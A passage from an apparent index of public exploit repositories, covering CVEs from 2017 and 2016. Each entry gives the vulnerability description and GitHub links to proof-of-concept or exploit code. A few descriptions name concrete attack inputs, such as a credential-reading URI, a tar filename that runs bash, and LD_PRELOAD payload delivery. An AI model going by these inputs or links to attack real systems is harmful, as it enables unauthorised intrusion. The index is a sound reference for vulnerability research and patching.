In Apache httpd 2.4.0 to 2.4.29, the expression specified in <FilesMatch> could match '$' to a newline character in a malicious filename, rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are are externally blocked, but only by matching the trailing portion of the filename.
- [whisp1830/CVE-2017-15715](https://github.com/whisp1830/CVE-2017-15715)
### CVE-2017-15944 (2017-12-11)
Palo Alto Networks PAN-OS before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface.
- [xxnbyy/CVE-2017-15944-POC](https://github.com/xxnbyy/CVE-2017-15944-POC)
- [surajraghuvanshi/PaloAltoRceDetectionAndExploit](https://github.com/surajraghuvanshi/PaloAltoRceDetectionAndExploit)
- [yukar1z0e/CVE-2017-15944](https://github.com/yukar1z0e/CVE-2017-15944)
- [3yujw7njai/PaloAlto_EXP](https://github.com/3yujw7njai/PaloAlto_EXP)
### CVE-2017-15950 (2017-10-31)
Flexense SyncBreeze Enterprise version 10.1.16 is vulnerable to a buffer overflow that can be exploited for arbitrary code execution. The flaw is triggered by providing a long input into the "Destination directory" field, either within an XML document or through use of passive mode.
- [rnnsz/CVE-2017-15950](https://github.com/rnnsz/CVE-2017-15950)
### CVE-2017-16082 (2018-06-07)
A remote code execution vulnerability was found within the pg module when the remote database or query specifies a specially crafted column name. There are 2 likely scenarios in which one would likely be vulnerable. 1) Executing unsafe, user-supplied sql which contains a malicious column name. 2) Connecting to an untrusted database and executing a query which returns results where any of the column names are malicious.
- [nulldreams/CVE-2017-16082](https://github.com/nulldreams/CVE-2017-16082)
### CVE-2017-16088 (2018-06-07)
The safe-eval module describes itself as a safer version of eval. By accessing the object constructors, un-sanitized user input can access the entire standard library and effectively break out of the sandbox.
- [Flyy-yu/CVE-2017-16088](https://github.com/Flyy-yu/CVE-2017-16088)
### CVE-2017-16245
- [AOCorsaire/CVE-2017-16245](https://github.com/AOCorsaire/CVE-2017-16245)
### CVE-2017-16524 (2017-11-06)
Web Viewer 1.0.0.193 on Samsung SRN-1670D devices suffers from an Unrestricted file upload vulnerability: 'network_ssl_upload.php' allows remote authenticated attackers to upload and execute arbitrary PHP code via a filename with a .php extension, which is then accessed via a direct request to the file in the upload/ directory. To authenticate for this attack, one can obtain web-interface credentials in cleartext by leveraging the existing Local File Read Vulnerability referenced as CVE-2015-8279, which allows remote attackers to read the web-interface credentials via a request for the cslog_export.php?path=/root/php_modules/lighttpd/sbin/userpw URI.
- [realistic-security/CVE-2017-16524](https://github.com/realistic-security/CVE-2017-16524)
### CVE-2017-16541 (2017-11-04)
Tor Browser before 7.0.9 on macOS and Linux allows remote attackers to bypass the intended anonymity feature and discover a client IP address via vectors involving a crafted web site that leverages file:// mishandling in Firefox, aka TorMoil. NOTE: Tails is unaffected.
- [Ethan-Chen-uwo/A-breif-introduction-of-CVE-2017-16541](https://github.com/Ethan-Chen-uwo/A-breif-introduction-of-CVE-2017-16541)
### CVE-2017-16567 (2017-11-09)
Cross-site scripting (XSS) vulnerability in Logitech Media Server 7.9.0 allows remote attackers to inject arbitrary web script or HTML via a "favorite."
- [dewankpant/CVE-2017-16567](https://github.com/dewankpant/CVE-2017-16567)
### CVE-2017-16568 (2017-11-09)
Cross-site scripting (XSS) vulnerability in Logitech Media Server 7.9.0 allows remote attackers to inject arbitrary web script or HTML via a radio URL.
- [dewankpant/CVE-2017-16568](https://github.com/dewankpant/CVE-2017-16568)
### CVE-2017-16651 (2017-11-09)
Roundcube Webmail before 1.1.10, 1.2.x before 1.2.7, and 1.3.x before 1.3.3 allows unauthorized access to arbitrary files on the host's filesystem, including configuration files, as exploited in the wild in November 2017. The attacker must be able to authenticate at the target system with a valid username/password as the attack requires an active session. The issue is related to file-based attachment plugins and _task=settings&_action=upload-display&_from=timezone requests.
- [ropbear/CVE-2017-16651](https://github.com/ropbear/CVE-2017-16651)
- [sephiroth950911/CVE-2017-16651-Exploit](https://github.com/sephiroth950911/CVE-2017-16651-Exploit)
### CVE-2017-16720 (2018-01-05)
A Path Traversal issue was discovered in WebAccess versions 8.3.2 and earlier. An attacker has access to files within the directory structure of the target device.
- [CN016/WebAccess-CVE-2017-16720-](https://github.com/CN016/WebAccess-CVE-2017-16720-)
### CVE-2017-16744 (2018-08-20)
A path traversal vulnerability in Tridium Niagara AX Versions 3.8 and prior and Niagara 4 systems Versions 4.4 and prior installed on Microsoft Windows Systems can be exploited by leveraging valid platform (administrator) credentials.
- [GainSec/CVE-2017-16744-and-CVE-2017-16748-Tridium-Niagara](https://github.com/GainSec/CVE-2017-16744-and-CVE-2017-16748-Tridium-Niagara)
### CVE-2017-16778 (2019-12-24)
An access control weakness in the DTMF tone receiver of Fermax Outdoor Panel allows physical attackers to inject a Dual-Tone-Multi-Frequency (DTMF) tone to invoke an access grant that would allow physical access to a restricted floor/level. By design, only a residential unit owner may allow such an access grant. However, due to incorrect access control, an attacker could inject it via the speaker unit to perform an access grant to gain unauthorized access, as demonstrated by a loud DTMF tone representing '1' and a long '#' (697 Hz and 1209 Hz, followed by 941 Hz and 1477 Hz).
- [breaktoprotect/CVE-2017-16778-Intercom-DTMF-Injection](https://github.com/breaktoprotect/CVE-2017-16778-Intercom-DTMF-Injection)
### CVE-2017-16806 (2017-11-13)
The Process function in RemoteTaskServer/WebServer/HttpServer.cs in Ulterius before 1.9.5.0 allows HTTP server directory traversal.
- [rickoooooo/ulteriusExploit](https://github.com/rickoooooo/ulteriusExploit)
### CVE-2017-16943 (2017-11-25)
The receive_msg function in receive.c in the SMTP daemon in Exim 4.88 and 4.89 allows remote attackers to execute arbitrary code or cause a denial of service (use-after-free) via vectors involving BDAT commands.
- [beraphin/CVE-2017-16943](https://github.com/beraphin/CVE-2017-16943)
### CVE-2017-16994 (2017-11-27)
The walk_hugetlb_range function in mm/pagewalk.c in the Linux kernel before 4.14.2 mishandles holes in hugetlb ranges, which allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call.
- [jedai47/CVE-2017-16994](https://github.com/jedai47/CVE-2017-16994)
### CVE-2017-16995 (2017-12-22)
The check_alu_op function in kernel/bpf/verifier.c in the Linux kernel through 4.4 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging incorrect sign extension.
- [C0dak/CVE-2017-16995](https://github.com/C0dak/CVE-2017-16995)
- [Al1ex/CVE-2017-16995](https://github.com/Al1ex/CVE-2017-16995)
- [gugronnier/CVE-2017-16995](https://github.com/gugronnier/CVE-2017-16995)
- [senyuuri/cve-2017-16995](https://github.com/senyuuri/cve-2017-16995)
- [vnik5287/CVE-2017-16995](https://github.com/vnik5287/CVE-2017-16995)
- [littlebin404/CVE-2017-16995](https://github.com/littlebin404/CVE-2017-16995)
- [Lumindu/CVE-2017-16995-Linux-Kernel---BPF-Sign-Extension-Local-Privilege-Escalation-](https://github.com/Lumindu/CVE-2017-16995-Linux-Kernel---BPF-Sign-Extension-Local-Privilege-Escalation-)
- [ph4ntonn/CVE-2017-16995](https://github.com/ph4ntonn/CVE-2017-16995)
- [ivilpez/cve-2017-16995.c](https://github.com/ivilpez/cve-2017-16995.c)
- [fei9747/CVE-2017-16995](https://github.com/fei9747/CVE-2017-16995)
- [anldori/CVE-2017-16995](https://github.com/anldori/CVE-2017-16995)
- [mareks1007/cve-2017-16995](https://github.com/mareks1007/cve-2017-16995)
- [ZhiQiAnSecFork/cve-2017-16995](https://github.com/ZhiQiAnSecFork/cve-2017-16995)
### CVE-2017-16997 (2017-12-18)
elf/dl-load.c in the GNU C Library (aka glibc or libc6) 2.19 through 2.26 mishandles RPATH and RUNPATH containing $ORIGIN for a privileged (setuid or AT_SECURE) program, which allows local users to gain privileges via a Trojan horse library in the current working directory, related to the fillin_rpath and decompose_rpath functions. This is associated with misinterpretion of an empty RPATH/RUNPATH token as the "./" directory. NOTE: this configuration of RPATH/RUNPATH for a privileged program is apparently very uncommon; most likely, no such program is shipped with any common Linux distribution.
- [Xiami2012/CVE-2017-16997-poc](https://github.com/Xiami2012/CVE-2017-16997-poc)
### CVE-2017-17058 (2017-11-29)
The WooCommerce plugin through 3.x for WordPress has a Directory Traversal Vulnerability via a /wp-content/plugins/woocommerce/templates/emails/plain/ URI, which accesses a parent directory. NOTE: a software maintainer indicates that Directory Traversal is not possible because all of the template files have "if (!defined('ABSPATH')) {exit;}" code
- [fu2x2000/CVE-2017-17058-woo_exploit](https://github.com/fu2x2000/CVE-2017-17058-woo_exploit)
### CVE-2017-17099 (2017-12-03)
There exists an unauthenticated SEH based Buffer Overflow vulnerability in the HTTP server of Flexense SyncBreeze Enterprise v10.1.16. When sending a GET request with an excessive length, it is possible for a malicious user to overwrite the SEH record and execute a payload that would run under the Windows SYSTEM account.
- [wetw0rk/Exploit-Development](https://github.com/wetw0rk/Exploit-Development)
### CVE-2017-17215 (2018-03-20)
Huawei HG532 with some customized versions has a remote code execution vulnerability. An authenticated attacker could send malicious packets to port 37215 to launch attacks. Successful exploit could lead to the remote execution of arbitrary code.
- [1337g/CVE-2017-17215](https://github.com/1337g/CVE-2017-17215)
- [wilfred-wulbou/HG532d-RCE-Exploit](https://github.com/wilfred-wulbou/HG532d-RCE-Exploit)
- [ltfafei/HuaWei_Route_HG532_RCE_CVE-2017-17215](https://github.com/ltfafei/HuaWei_Route_HG532_RCE_CVE-2017-17215)
### CVE-2017-17275
- [kd992102/CVE-2017-17275](https://github.com/kd992102/CVE-2017-17275)
### CVE-2017-17309 (2018-06-14)
Huawei HG255s-10 V100R001C163B025SP02 has a path traversal vulnerability due to insufficient validation of the received HTTP requests, a remote attacker may access the local files on the device without authentication.
- [exploit-labs/huawei_hg255s_exploit](https://github.com/exploit-labs/huawei_hg255s_exploit)
### CVE-2017-17485 (2018-01-10)
FasterXML jackson-databind through 2.8.10 and 2.9.x through 2.9.3 allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the Spring libraries are available in the classpath.
- [tafamace/CVE-2017-17485](https://github.com/tafamace/CVE-2017-17485)
- [x7iaob/cve-2017-17485](https://github.com/x7iaob/cve-2017-17485)
- [Al1ex/CVE-2017-17485](https://github.com/Al1ex/CVE-2017-17485)
### CVE-2017-17562 (2017-12-12)
Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked. This is a result of initializing the environment of forked CGI scripts using untrusted HTTP request parameters in the cgiHandler function in cgi.c. When combined with the glibc dynamic linker, this behaviour can be abused for remote code execution using special parameter names such as LD_PRELOAD. An attacker can POST their shared object payload in the body of the request, and reference it using /proc/self/fd/0.
- [1337g/CVE-2017-17562](https://github.com/1337g/CVE-2017-17562)
- [ivanitlearning/CVE-2017-17562](https://github.com/ivanitlearning/CVE-2017-17562)
- [crispy-peppers/Goahead-CVE-2017-17562](https://github.com/crispy-peppers/Goahead-CVE-2017-17562)
- [nu11pointer/goahead-rce-exploit](https://github.com/nu11pointer/goahead-rce-exploit)
- [freitzzz/bash-CVE-2017-17562](https://github.com/freitzzz/bash-CVE-2017-17562)
### CVE-2017-17692 (2017-12-21)
Samsung Internet Browser 5.4.02.3 allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via crafted JavaScript code that redirects to a child tab and rewrites the innerHTML property.
- [specloli/CVE-2017-17692](https://github.com/specloli/CVE-2017-17692)
### CVE-2017-17736 (2018-03-23)
Kentico 9.0 before 9.0.51 and 10.0 before 10.0.48 allows remote attackers to obtain Global Administrator access by visiting CMSInstall/install.aspx and then navigating to the CMS Administration Dashboard.
- [0xSojalSec/Nuclei-TemplatesNuclei-Templates-CVE-2017-17736](https://github.com/0xSojalSec/Nuclei-TemplatesNuclei-Templates-CVE-2017-17736)
### CVE-2017-17917 (2017-12-29)
SQL injection vulnerability in the 'where' method in Ruby on Rails 5.1.4 and earlier allows remote attackers to execute arbitrary SQL commands via the 'id' parameter. NOTE: The vendor disputes this issue because the documentation states that this method is not intended for use with untrusted input
- [matiasarenhard/rails-cve-2017-17917](https://github.com/matiasarenhard/rails-cve-2017-17917)
### CVE-2017-18019 (2018-01-04)
In K7 Total Security before 15.1.0.305, user-controlled input to the K7Sentry device is not sufficiently sanitized: the user-controlled input can be used to compare an arbitrary memory address with a fixed value, which in turn can be used to read the contents of arbitrary memory. Similarly, the product crashes upon a \\.\K7Sentry DeviceIoControl call with an invalid kernel pointer.
- [SpiralBL0CK/CVE-2017-18019](https://github.com/SpiralBL0CK/CVE-2017-18019)
### CVE-2017-18044 (2018-01-19)
A Command Injection issue was discovered in ContentStore/Base/CVDataPipe.dll in Commvault before v11 SP6. A certain message parsing function inside the Commvault service does not properly validate the input of an incoming string before passing it to CreateProcess. As a result, a specially crafted message can inject commands that will be executed on the target operating system. Exploitation of this vulnerability does not require authentication and can lead to SYSTEM level privilege on any system running the cvd daemon. This is a different vulnerability than CVE-2017-3195.
- [securifera/CVE-2017-18044-Exploit](https://github.com/securifera/CVE-2017-18044-Exploit)
### CVE-2017-18345 (2018-08-26)
The Joomanager component through 2.0.0 for Joomla! has an arbitrary file download issue, resulting in exposing the credentials of the database via an index.php?option=com_joomanager&controller=details&task=download&path=configuration.php request.
- [Luth1er/CVE-2017-18345-COM_JOOMANAGER-ARBITRARY-FILE-DOWNLOAD](https://github.com/Luth1er/CVE-2017-18345-COM_JOOMANAGER-ARBITRARY-FILE-DOWNLOAD)
### CVE-2017-18349 (2018-10-23)
parseObject in Fastjson before 1.2.25, as used in FastjsonEngine in Pippo 1.11.0 and other products, allows remote attackers to execute arbitrary code via a crafted JSON request, as demonstrated by a crafted rmi:// URI in the dataSourceName field of HTTP POST data to the Pippo /json URI, which is mishandled in AjaxApplication.java.
- [h0cksr/Fastjson--CVE-2017-18349-](https://github.com/h0cksr/Fastjson--CVE-2017-18349-)
### CVE-2017-18486 (2019-08-09)
Jitbit Helpdesk before 9.0.3 allows remote attackers to escalate privileges because of mishandling of the User/AutoLogin userHash parameter. By inspecting the token value provided in a password reset link, a user can leverage a weak PRNG to recover the shared secret used by the server for remote authentication. The shared secret can be used to escalate privileges by forging new tokens for any user. These tokens can be used to automatically log in as the affected user.
- [Kc57/JitBit_Helpdesk_Auth_Bypass](https://github.com/Kc57/JitBit_Helpdesk_Auth_Bypass)
### CVE-2017-18635 (2019-09-25)
An XSS vulnerability was discovered in noVNC before 0.6.2 in which the remote VNC server could inject arbitrary HTML into the noVNC web page via the messages propagated to the status field, such as the VNC server name.
- [ShielderSec/CVE-2017-18635](https://github.com/ShielderSec/CVE-2017-18635)
### CVE-2017-20165 (2023-01-09)
Es wurde eine Schwachstelle in debug-js debug bis 3.0.x entdeckt. Sie wurde als problematisch eingestuft. Es betrifft die Funktion useColors der Datei src/node.js. Durch Manipulieren des Arguments str mit unbekannten Daten kann eine inefficient regular expression complexity-Schwachstelle ausgenutzt werden. Ein Aktualisieren auf die Version 3.1.0 vermag dieses Problem zu lösen. Der Patch wird als c38a0166c266a679c8de012d4eaccec3f944e685 bezeichnet. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen.
- [fastify/send](https://github.com/fastify/send)
### CVE-2017-98505
- [mike-williams/Struts2Vuln](https://github.com/mike-williams/Struts2Vuln)
### CVE-2017-1000000
- [smythtech/DWF-CVE-2017-1000000](https://github.com/smythtech/DWF-CVE-2017-1000000)
### CVE-2017-1000004 (2017-07-13)
ATutor version 2.2.1 and earlier are vulnerable to a SQL injection in the Assignment Dropbox, BasicLTI, Blog Post, Blog, Group Course Email, Course Alumni, Course Enrolment, Group Membership, Course unenrolment, Course Enrolment List Search, Glossary, Social Group Member Search, Social Friend Search, Social Group Search, File Comment, Gradebook Test Title, User Group Membership, Inbox/Sent Items, Sent Messages, Links, Photo Album, Poll, Social Application, Social Profile, Test, Content Menu, Auto-Login, and Gradebook components resulting in information disclosure, database modification, or potential code execution.
- [yazan828/CVE-2017-1000004](https://github.com/yazan828/CVE-2017-1000004)
### CVE-2017-1000028 (2017-07-13)
Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.
- [NeonNOXX/CVE-2017-1000028](https://github.com/NeonNOXX/CVE-2017-1000028)
### CVE-2017-1000083 (2017-09-05)
backend/comics/comics-document.c (aka the comic book backend) in GNOME Evince before 3.24.1 allows remote attackers to execute arbitrary commands via a .cbt file that is a TAR archive containing a filename beginning with a "--" command-line option substring, as demonstrated by a --checkpoint-action=exec=bash at the beginning of the filename.
- [matlink/evince-cve-2017-1000083](https://github.com/matlink/evince-cve-2017-1000083)
- [matlink/cve-2017-1000083-atril-nautilus](https://github.com/matlink/cve-2017-1000083-atril-nautilus)
### CVE-2017-1000112 (2017-10-04)
Linux kernel: Exploitable memory corruption due to UFO to non-UFO path switch. When building a UFO packet with MSG_MORE __ip_append_data() calls ip_ufo_append_data() to append. However in between two send() calls, the append path can be switched from UFO to non-UFO one, which leads to a memory corruption. In case UFO packet lengths exceeds MTU, copy = maxfraglen - skb->len becomes negative on the non-UFO path and the branch to allocate new skb is taken. This triggers fragmentation and computation of fraggap = skb_prev->len - maxfraglen. Fraggap can exceed MTU, causing copy = datalen - transhdrlen - fraggap to become negative. Subsequently skb_copy_and_csum_bits() writes out-of-bounds. A similar issue is present in IPv6 code. The bug was introduced in e89e9cf539a2 ("[IPv4/IPv6]: UFO Scatter-gather approach") on Oct 18 2005.
- [hikame/docker_escape_pwn](https://github.com/hikame/docker_escape_pwn)
- [ol0273st-s/CVE-2017-1000112-Adpated](https://github.com/ol0273st-s/CVE-2017-1000112-Adpated)
- [IT19083124/SNP-Assignment](https://github.com/IT19083124/SNP-Assignment)
### CVE-2017-1000117 (2017-10-04)
A malicious third-party can give a crafted "ssh://..." URL to an unsuspecting victim, and an attempt to visit the URL can result in any program that exists on the victim's machine being executed. Such a URL could be placed in the .gitmodules file of a malicious project, and an unsuspecting victim could be tricked into running "git clone --recurse-submodules" to trigger the vulnerability.
- [timwr/CVE-2017-1000117](https://github.com/timwr/CVE-2017-1000117)
- [Manouchehri/CVE-2017-1000117](https://github.com/Manouchehri/CVE-2017-1000117)
- [thelastbyte/CVE-2017-1000117](https://github.com/thelastbyte/CVE-2017-1000117)
- [alilangtest/CVE-2017-1000117](https://github.com/alilangtest/CVE-2017-1000117)
- [VulApps/CVE-2017-1000117](https://github.com/VulApps/CVE-2017-1000117)
- [greymd/CVE-2017-1000117](https://github.com/greymd/CVE-2017-1000117)
- [shogo82148/Fix-CVE-2017-1000117](https://github.com/shogo82148/Fix-CVE-2017-1000117)
- [sasairc/CVE-2017-1000117_wasawasa](https://github.com/sasairc/CVE-2017-1000117_wasawasa)
- [Shadow5523/CVE-2017-1000117-test](https://github.com/Shadow5523/CVE-2017-1000117-test)
- [ieee0824/CVE-2017-1000117](https://github.com/ieee0824/CVE-2017-1000117)
- [rootclay/CVE-2017-1000117](https://github.com/rootclay/CVE-2017-1000117)
- [ieee0824/CVE-2017-1000117-sl](https://github.com/ieee0824/CVE-2017-1000117-sl)
- [takehaya/CVE-2017-1000117](https://github.com/takehaya/CVE-2017-1000117)
- [ikmski/CVE-2017-1000117](https://github.com/ikmski/CVE-2017-1000117)
- [nkoneko/CVE-2017-1000117](https://github.com/nkoneko/CVE-2017-1000117)
- [chenzhuo0618/test](https://github.com/chenzhuo0618/test)
- [siling2017/CVE-2017-1000117](https://github.com/siling2017/CVE-2017-1000117)
- [Q2h1Cg/CVE-2017-1000117](https://github.com/Q2h1Cg/CVE-2017-1000117)
- [cved-sources/cve-2017-1000117](https://github.com/cved-sources/cve-2017-1000117)
- [leezp/CVE-2017-1000117](https://github.com/leezp/CVE-2017-1000117)
- [AnonymKing/CVE-2017-1000117](https://github.com/AnonymKing/CVE-2017-1000117)
- [Jerry-zhuang/CVE-2017-1000117](https://github.com/Jerry-zhuang/CVE-2017-1000117)
### CVE-2017-1000170 (2017-11-17)
jqueryFileTree 2.1.5 and older Directory Traversal
- [Nickguitar/Jquery-File-Tree-1.6.6-Path-Traversal](https://github.com/Nickguitar/Jquery-File-Tree-1.6.6-Path-Traversal)
### CVE-2017-1000250 (2017-09-12)
All versions of the SDP server in BlueZ 5.46 and earlier are vulnerable to an information disclosure vulnerability which allows remote attackers to obtain sensitive information from the bluetoothd process memory. This vulnerability lies in the processing of SDP search attribute requests.
- [olav-st/CVE-2017-1000250-PoC](https://github.com/olav-st/CVE-2017-1000250-PoC)
### CVE-2017-1000251 (2017-09-12)
The native Bluetooth stack in the Linux Kernel (BlueZ), starting at the Linux kernel version 2.6.32 and up to and including 4.13.1, are vulnerable to a stack overflow vulnerability in the processing of L2CAP configuration responses resulting in Remote code execution in kernel space.
- [hayzamjs/Blueborne-CVE-2017-1000251](https://github.com/hayzamjs/Blueborne-CVE-2017-1000251)
- [tlatkdgus1/blueborne-CVE-2017-1000251](https://github.com/tlatkdgus1/blueborne-CVE-2017-1000251)
- [own2pwn/blueborne-CVE-2017-1000251-POC](https://github.com/own2pwn/blueborne-CVE-2017-1000251-POC)
- [istanescu/CVE-2017-1000251_Exploit](https://github.com/istanescu/CVE-2017-1000251_Exploit)
- [sgxgsx/blueborne-CVE-2017-1000251](https://github.com/sgxgsx/blueborne-CVE-2017-1000251)
### CVE-2017-1000253 (2017-10-04)
Linux distributions that have not patched their long-term kernels with https://git.kernel.org/linus/a87938b2e246b81b4fb713edb371a9fa3c5c3c86 (committed on April 14, 2015). This kernel vulnerability was fixed in April 2015 by commit a87938b2e246b81b4fb713edb371a9fa3c5c3c86 (backported to Linux 3.10.77 in May 2015), but it was not recognized as a security threat. With CONFIG_ARCH_BINFMT_ELF_RANDOMIZE_PIE enabled, and a normal top-down address allocation strategy, load_elf_binary() will attempt to map a PIE binary into an address range immediately below mm->mmap_base. Unfortunately, load_elf_ binary() does not take account of the need to allocate sufficient space for the entire binary which means that, while the first PT_LOAD segment is mapped below mm->mmap_base, the subsequent PT_LOAD segment(s) end up being mapped above mm->mmap_base into the are that is supposed to be the "gap" between the stack and the binary.
- [RicterZ/PIE-Stack-Clash-CVE-2017-1000253](https://github.com/RicterZ/PIE-Stack-Clash-CVE-2017-1000253)
- [sxlmnwb/CVE-2017-1000253](https://github.com/sxlmnwb/CVE-2017-1000253)
### CVE-2017-1000353 (2018-01-29)
Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are vulnerable to an unauthenticated remote code execution. An unauthenticated remote code execution vulnerability allowed attackers to transfer a serialized Java `SignedObject` object to the Jenkins CLI, that would be deserialized using a new `ObjectInputStream`, bypassing the existing blacklist-based protection mechanism. We're fixing this issue by adding `SignedObject` to the blacklist. We're also backporting the new HTTP CLI protocol from Jenkins 2.54 to LTS 2.46.2, and deprecating the remoting-based (i.e. Java serialization) CLI protocol, disabling it by default.
- [vulhub/CVE-2017-1000353](https://github.com/vulhub/CVE-2017-1000353)
- [r00t4dm/Jenkins-CVE-2017-1000353](https://github.com/r00t4dm/Jenkins-CVE-2017-1000353)
### CVE-2017-1000367 (2017-06-05)
Todd Miller's sudo version 1.8.20 and earlier is vulnerable to an input validation (embedded spaces) in the get_process_ttyname() function resulting in information disclosure and command execution.
- [c0d3z3r0/sudo-CVE-2017-1000367](https://github.com/c0d3z3r0/sudo-CVE-2017-1000367)
- [homjxi0e/CVE-2017-1000367](https://github.com/homjxi0e/CVE-2017-1000367)
- [pucerpocok/sudo_exploit](https://github.com/pucerpocok/sudo_exploit)
### CVE-2017-1000371 (2017-06-19)
The offset2lib patch as used by the Linux Kernel contains a vulnerability, if RLIMIT_STACK is set to RLIM_INFINITY and 1 Gigabyte of memory is allocated (the maximum under the 1/4 restriction) then the stack will be grown down to 0x80000000, and as the PIE binary is mapped above 0x80000000 the minimum distance between the end of the PIE binary's read-write segment and the start of the stack becomes small enough that the stack guard page can be jumped over by an attacker. This affects Linux Kernel version 4.11.5. This is a different issue than CVE-2017-1000370 and CVE-2017-1000365. This issue appears to be limited to i386 based systems.
- [Trinadh465/linux-4.1.15_CVE-2017-1000371](https://github.com/Trinadh465/linux-4.1.15_CVE-2017-1000371)
### CVE-2017-1000405 (2017-11-30)
The Linux Kernel versions 2.6.38 through 4.14 have a problematic use of pmd_mkdirty() in the touch_pmd() function inside the THP implementation. touch_pmd() can be reached by get_user_pages(). In such case, the pmd will become dirty. This scenario breaks the new can_follow_write_pmd()'s logic - pmd can become dirty without going through a COW cycle. This bug is not as severe as the original "Dirty cow" because an ext4 file (or any other regular file) cannot be mapped using THP. Nevertheless, it does allow us to overwrite read-only huge pages. For example, the zero huge page and sealed shmem files can be overwritten (since their mapping can be populated using THP). Note that after the first write page-fault to the zero page, it will be replaced with a new fresh (and zeroed) thp.
- [bindecy/HugeDirtyCowPOC](https://github.com/bindecy/HugeDirtyCowPOC)
### CVE-2017-1000475 (2018-01-24)
FreeSSHd 1.3.1 version is vulnerable to an Unquoted Path Service allowing local users to launch processes with elevated privileges.
- [lajarajorge/CVE-2017-1000475](https://github.com/lajarajorge/CVE-2017-1000475)
### CVE-2017-1000486 (2018-01-03)
Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution
- [pimps/CVE-2017-1000486](https://github.com/pimps/CVE-2017-1000486)
- [mogwailabs/CVE-2017-1000486](https://github.com/mogwailabs/CVE-2017-1000486)
- [cved-sources/cve-2017-1000486](https://github.com/cved-sources/cve-2017-1000486)
- [Pastea/CVE-2017-1000486](https://github.com/Pastea/CVE-2017-1000486)
- [oppsec/pwnfaces](https://github.com/oppsec/pwnfaces)
- [LongWayHomie/CVE-2017-1000486](https://github.com/LongWayHomie/CVE-2017-1000486)
- [jam620/primefaces](https://github.com/jam620/primefaces)
### CVE-2017-1000499 (2018-01-03)
phpMyAdmin versions 4.7.x (prior to 4.7.6.1/4.7.7) are vulnerable to a CSRF weakness. By deceiving a user to click on a crafted URL, it is possible to perform harmful database operations such as deleting records, dropping/truncating tables etc.
- [Villaquiranm/5MMISSI-CVE-2017-1000499](https://github.com/Villaquiranm/5MMISSI-CVE-2017-1000499)
### CVE-2017-1002101 (2018-03-13)
In Kubernetes versions 1.3.x, 1.4.x, 1.5.x, 1.6.x and prior to versions 1.7.14, 1.8.9 and 1.9.4 containers using subpath volume mounts with any volume type (including non-privileged pods, subject to file permissions) can access files/directories outside of the volume, including the host's filesystem.
- [bgeesaman/subpath-exploit](https://github.com/bgeesaman/subpath-exploit)
## 2016
### CVE-2016-0034 (2016-01-13)
Microsoft Silverlight 5 before 5.1.41212.0 mishandles negative offsets during decoding, which allows remote attackers to execute arbitrary code or cause a denial of service (object-header corruption) via a crafted web site, aka "Silverlight Runtime Remote Code Execution Vulnerability."
- [hybridious/CVE-2016-0034-Decompile](https://github.com/hybridious/CVE-2016-0034-Decompile)
### CVE-2016-0040 (2016-02-10)
The kernel in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 allows local users to gain privileges via a crafted application, aka "Windows Elevation of Privilege Vulnerability."
- [Rootkitsmm-zz/cve-2016-0040](https://github.com/Rootkitsmm-zz/cve-2016-0040)
- [de7ec7ed/CVE-2016-0040](https://github.com/de7ec7ed/CVE-2016-0040)
### CVE-2016-0049 (2016-02-10)
Kerberos in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, and Windows 10 Gold and 1511 does not properly validate password changes, which allows remote attackers to bypass authentication by deploying a crafted Key Distribution Center (KDC) and then performing a sign-in action, aka "Windows Kerberos Security Feature Bypass."
- [JackOfMostTrades/bluebox](https://github.com/JackOfMostTrades/bluebox)
### CVE-2016-0051 (2016-02-10)
The WebDAV client in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold and 1511 allows local users to gain privileges via a crafted application, aka "WebDAV Elevation of Privilege Vulnerability."
- [koczkatamas/CVE-2016-0051](https://github.com/koczkatamas/CVE-2016-0051)
- [hexx0r/CVE-2016-0051](https://github.com/hexx0r/CVE-2016-0051)
- [ganrann/CVE-2016-0051](https://github.com/ganrann/CVE-2016-0051)
### CVE-2016-0095 (2016-03-09)
The kernel-mode driver in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold and 1511 allows local users to gain privileges via a crafted application, aka "Win32k Elevation of Privilege Vulnerability," a different vulnerability than CVE-2016-0093, CVE-2016-0094, and CVE-2016-0096.
- [fengjixuchui/cve-2016-0095-x64](https://github.com/fengjixuchui/cve-2016-0095-x64)
### CVE-2016-0099 (2016-03-09)
The Secondary Logon Service in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold and 1511 does not properly process request handles, which allows local users to gain privileges via a crafted application, aka "Secondary Logon Elevation of Privilege Vulnerability."
- [zcgonvh/MS16-032](https://github.com/zcgonvh/MS16-032)
### CVE-2016-010033
- [zi0Black/CVE-2016-010033-010045](https://github.com/zi0Black/CVE-2016-010033-010045)
### CVE-2016-0189 (2016-05-11)
The Microsoft (1) JScript 5.8 and (2) VBScript 5.7 and 5.8 engines, as used in Internet Explorer 9 through 11 and other products, allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Scripting Engine Memory Corruption Vulnerability," a different vulnerability than CVE-2016-0187.
- [theori-io/cve-2016-0189](https://github.com/theori-io/cve-2016-0189)
